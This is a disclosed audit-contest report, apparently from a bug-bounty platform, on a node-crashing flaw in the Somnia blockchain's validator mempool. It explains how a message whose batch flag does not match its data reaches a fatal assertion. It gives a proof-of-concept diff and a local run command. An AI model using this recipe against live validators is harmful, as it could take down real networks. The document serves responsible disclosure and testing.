'%3e%3cpath%20d='M12.4997%201.33325C10.39%201.33325%208.32772%201.95884%206.5736%203.13091C4.81947%204.30298%203.4523%205.96888%202.64496%207.91796C1.83763%209.86704%201.62639%2012.0118%202.03797%2014.0809C2.44955%2016.15%203.46545%2018.0506%204.95721%2019.5424C6.44897%2021.0342%208.34959%2022.0501%2010.4187%2022.4616C12.4878%2022.8732%2014.6326%2022.662%2016.5816%2021.8546C18.5307%2021.0473%2020.1966%2019.6801%2021.3687%2017.926C22.5408%2016.1719%2023.1663%2014.1096%2023.1663%2011.9999C23.1663%209.17094%2022.0425%206.45783%2020.0422%204.45745C18.0418%202.45706%2015.3287%201.33325%2012.4997%201.33325ZM12.4997%2021.3333C10.6537%2021.3333%208.84922%2020.7859%207.31436%2019.7603C5.7795%2018.7347%204.58322%2017.2771%203.8768%2015.5716C3.17039%2013.8662%202.98555%2011.9896%203.34568%2010.1791C3.70581%208.36859%204.59473%206.70554%205.90002%205.40025C7.20531%204.09496%208.86835%203.20605%2010.6788%202.84592C12.4893%202.48579%2014.3659%202.67063%2016.0714%203.37704C17.7768%204.08346%2019.2345%205.27974%2020.2601%206.8146C21.2856%208.34945%2021.833%2010.154%2021.833%2011.9999C21.833%2014.4753%2020.8497%2016.8492%2019.0993%2018.5996C17.349%2020.3499%2014.975%2021.3333%2012.4997%2021.3333Z'%20fill='white'/%3e%3cpath%20d='M19.167%208.06667C19.042%207.9425%2018.8731%207.8728%2018.697%207.8728C18.5208%207.8728%2018.3519%207.9425%2018.227%208.06667L10.8269%2015.4333L6.82695%2011.4333C6.70495%2011.3016%206.53562%2011.2237%206.35621%2011.2169C6.1768%2011.21%206.00201%2011.2747%205.87028%2011.3967C5.73856%2011.5187%205.66069%2011.688%205.65382%2011.8674C5.64694%2012.0468%205.71162%2012.2216%205.83362%2012.3533L10.8269%2017.3333L19.167%209.01333C19.2294%208.95136%2019.279%208.87762%2019.3129%208.79638C19.3467%208.71514%2019.3642%208.62801%2019.3642%208.54C19.3642%208.45199%2019.3467%208.36485%2019.3129%208.28361C19.279%208.20237%2019.2294%208.12864%2019.167%208.06667Z'%20fill='white'/%3e%3c/g%3e%3cdefs%3e%3cclipPath%20id='clip0_2790_31187'%3e%3crect%20width='24'%20height='24'%20fill='white'%20transform='translate(0.5)'/%3e%3c/clipPath%3e%3c/defs%3e%3c/svg%3e)
Somnia Disclosed Report
Audit report Somnia Audit Contest SendMempoolTransactionRequestMessage can contain a malicious transaction that crashes a node
Target
https://github.com/hackenproof-public/somnia
Vulnerability Details
SendMempoolTransactionRequestMessage has two important fields for this attack. The first is encoded_transaction_data and the second is is_batched_transaction. When a validator receives the message, it does not check whether is_batched_transaction matches the encoded_transaction_data. This means, there is no verification that encoded_transaction_data is actually not a batch when is_batched_transaction is set to false:
https://github.com/hackenproof-public/somnia/blob/ea5c191a893153fe020aac35532bbcaca0f8c5d1/somnia/mempool/validator_mempool.h#L100-L120
After this, the transaction is added either to the batched block creator or to the non-batched block creator, depending on the is_batched_transaction field. This allows an attacker to place a batched transaction into the non-batched block creator:
https://github.com/hackenproof-public/somnia/blob/ea5c191a893153fe020aac35532bbcaca0f8c5d1/somnia/mempool/validator_mempool.h#L84-L88
The non-batched block creator then tries to validate the transaction as non-batched and performs a RELEASE_ASSERT to check that the transaction is not batched:
https://github.com/hackenproof-public/somnia/blob/ea5c191a893153fe020aac35532bbcaca0f8c5d1/somnia/state/transaction_encoding.cc#L231-L232
This RELEASE_ASSERT fails, causing the entire node to crash. An attacker could send this malicious message to all validators, bringing down the entire network.
Validation steps
Apply the following diff to run the PoC:
diff --git a/ci/run-local-deployment.sh b/ci/run-local-deployment.sh
index ab51ed8c..f28df9e3 100755
--- a/ci/run-local-deployment.sh
+++ b/ci/run-local-deployment.sh
@@ -66,6 +66,11 @@ function addNodeAsValidator {
return
fi
+ if [ $validator_index == 1 ]; then # Node 1 is not a validator because only non validators send SendMempoolTransactionRequestMessage
+ echo "Skipping node $validator_index - not adding as validator"
+ return
+ fi
+
until $SOMNIA_BIN test add-test-validator \
--rpc-websocket-url $rpc_node_hostname \
--parameters-preset "$NETWORK_PRESET" \
diff --git a/somnia/mempool/non_validator_mempool.h b/somnia/mempool/non_validator_mempool.h
index c701af9f..f3b2b641 100644
--- a/somnia/mempool/non_validator_mempool.h
+++ b/somnia/mempool/non_validator_mempool.h
@@ -347,6 +347,7 @@ private:
// This next validator is connected. Send the transaction to this validator.
SendMempoolTransactionRequestMessage message;
message.encoded_transaction_data = transaction.transaction.encoded_transaction_data;
+ message.encoded_transaction_data[0] = 0xBF; //This makes the transaction a batch
message.is_batched_transaction = transaction.transaction.is_batched_transaction;
message.non_validator_transaction_id = transaction.non_validator_transaction_id;
protocol_outgoing_router.SendMessageToPeer<MempoolMessage>(validator_address,
The PoC can then be run with NETWORK_PRESET=mainnet-small ./ci/run-local-deployment.sh. After some time, the network will fail with a RELEASE_ASSERT.
Attachments
hidden 
Comments on this report are hidden 
Details 
Participants (2) 
